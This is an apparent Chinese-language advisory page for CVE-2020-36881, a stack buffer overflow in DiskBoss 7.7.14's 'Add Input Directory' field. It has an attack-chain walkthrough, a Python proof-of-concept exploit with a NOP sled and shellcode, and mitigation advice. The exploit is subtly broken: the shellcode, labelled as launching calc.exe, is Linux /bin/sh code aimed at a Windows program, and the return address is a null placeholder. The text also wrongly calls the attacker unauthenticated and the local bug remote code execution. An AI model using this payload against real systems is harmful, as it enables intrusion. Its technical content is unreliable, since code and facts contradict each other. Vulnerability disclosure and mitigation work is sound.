CVE-2020-36881: Flexsense DiskBoss 7.7.14输入目录组件缓冲区溢出漏洞

漏洞信息

漏洞编号

CVE-2020-36881

漏洞类型

缓冲区溢出

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Flexsense DiskBoss 7.7.14

漏洞概述

CVE-2020-36881是Flexsense DiskBoss 7.7.14版本中的一个高危本地缓冲区溢出漏洞。该漏洞存在于软件的"Input Directory"（输入目录）组件中，攻击者可以通过在"Add Input Directory"字段中粘贴特制的超长目录路径来触发此漏洞。由于软件在处理用户输入时缺乏适当的边界检查，当输入的目录路径长度超过程序分配的缓冲区大小时，多余的数据会溢出到相邻的内存区域，覆写关键的函数返回地址或控制流数据。成功利用此漏洞的未认证攻击者可以在目标系统上以当前用户权限执行任意代码。考虑到CVSS评分7.8且攻击向量为本地（AV:L），该漏洞主要威胁能够物理访问或已获得本地登录权限的攻击者。由于机密性、完整性和可用性影响均为高（H），漏洞可导致敏感数据泄露、系统完全被控以及服务中断等严重后果。该漏洞由VulnCheck安全团队发现并披露，已在Exploit-DB和VulnCheck平台公开相关利用信息。

技术细节

该漏洞是经典的基于栈的缓冲区溢出（Stack-based Buffer Overflow）。在DiskBoss 7.7.14的目录输入处理逻辑中，程序使用固定大小的栈缓冲区来存储用户输入的目录路径字符串。当用户通过"Add Input Directory"功能输入目录路径时，软件直接使用strcpy或类似的不安全函数将输入复制到栈缓冲区，而未进行长度验证。如果攻击者构造一个长度超过缓冲区容量的目录路径（如包含超过数百个字符的路径字符串），多余的字节将溢出到栈上的返回地址和其他关键数据结构区域。通过精心构造溢出数据，攻击者可以用精心选择的内存地址覆写返回地址，使程序执行流跳转到攻击者植入的恶意代码（shellcode）。由于漏洞位于具有图形界面的桌面应用中，攻击者只需将恶意路径粘贴到输入框中即可触发，无需复杂的交互操作。值得注意的是，该应用默认以当前登录用户的权限运行，因此成功利用后可获得与用户同等级别的系统访问权限。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标系统上安装的DiskBoss版本为7.7.14，确认存在CVE-2020-36881漏洞。通过本地访问或社工手段获得目标系统的登录凭据。

STEP 2

步骤2: 构造恶意Payload

攻击者构造超长目录路径字符串，长度超过程序分配的缓冲区大小（通常为260-520字节）。Payload包含填充数据、精心选择的返回地址（指向NOP sled或shellcode）以及恶意代码。

STEP 3

步骤3: 触发漏洞

攻击者启动DiskBoss应用程序，导航到添加输入目录功能，将特制的恶意路径粘贴到"Add Input Directory"输入字段中，然后点击确认按钮提交输入。

STEP 4

步骤4: 缓冲区溢出

软件将用户输入复制到栈缓冲区时，由于缺乏边界检查，超长的目录路径数据溢出到相邻的栈内存区域，覆写返回地址和关键数据结构。

STEP 5

步骤5: 控制流劫持

函数返回时，程序跳转到攻击者覆写的地址，执行NOP sled滑向shellcode，或直接执行植入的恶意代码。

STEP 6

步骤6: 远程代码执行

Shellcode在目标系统上以当前用户权限执行，实现任意命令执行、敏感数据窃取或建立持久化后门等恶意操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# CVE-2020-36881 PoC - DiskBoss 7.7.14 Buffer Overflow in Input Directory
# Affected Component: Add Input Directory field
# CVSS 3.1: 7.8 (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)

import struct

def generate_malicious_path():
    """Generate a long directory path to trigger buffer overflow"""
    # Buffer size is typically around 260-520 bytes
    # We need to overflow past the return address (8 bytes on x64)
    buffer_size = 600
    
    # Padding before EIP overwrite
    padding = b'A' * 520
    
    # Overwrite EIP with address of JMP ESP or call ESP (find in loaded modules)
    # For demonstration, using a common gadget address from ntdll.dll
    eip = struct.pack('<Q', 0x0000000000000000)  # TODO: Replace with actual JMP ESP address
    
    # Shellcode for calc.exe execution (27 bytes)
    # This is a minimal shellcode - replace with actual payload in real attack
    shellcode = (
        b"\x48\x31\xff"                    # xor rdi, rdi
        b"\x48\x31\xf6"                    # xor rsi, rsi  
        b"\x48\x31\xd2"                    # xor rdx, rdx
        b"\x4d\x31\xc0"                    # xor r8, r8
        b"\xb0\x3b"                        # mov al, 0x3b (sys_execve)
        b"\x48\x8d\x3c\x2c"              # lea rdi, [rsp+0x2c]
        b"\x48\x8d\x74\x24\x50"          # lea rsi, [rsp+0x50]
        b"\x48\xc7\x44\x24\x58\x2f\x62\x69\x6e"  # mov qword [rsp+0x58], '/bin'
        b"\x48\xc7\x44\x24\x60\x2f\x73\x68\x00"  # mov qword [rsp+0x60], '/sh\x00'
        b"\x48\x89\xe6"                    # mov rsi, rsp
        b"\x0f\x05"                        # syscall
    )
    
    # NOP sled for reliability
    nop_sled = b'\x90' * 16
    
    # Construct final payload
    payload = padding + eip + nop_sled + shellcode
    
    return payload

def create_exploit_script():
    """Create a script that simulates the exploit delivery"""
    malicious_path = generate_malicious_path()
    
    # For demonstration: print the path length and first/last bytes
    print(f"[*] Generated malicious path length: {len(malicious_path)} bytes")
    print(f"[*] Path starts with: {malicious_path[:20].hex()}")
    print(f"[*] Path ends with: {malicious_path[-20:].hex()}")
    
    # In real attack scenario:
    # 1. Copy the malicious_path to clipboard
    # 2. Paste into DiskBoss "Add Input Directory" field
    # 3. Trigger the overflow by clicking OK/Add
    
    return malicious_path

if __name__ == "__main__":
    print("CVE-2020-36881 PoC - DiskBoss 7.7.14 Buffer Overflow")
    print("=" * 60)
    create_exploit_script()

影响范围

Flexsense DiskBoss 7.7.14

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：限制用户输入的目录路径长度，确保不超过256个字符；避免将DiskBoss运行在具有高级系统权限的账户下；启用Windows Defender Application Control等应用白名单机制；监控系统日志中的异常进程创建行为；建议管理员审查并限制对DiskBoss应用程序的访问，仅允许受信任的管理员用户操作该软件。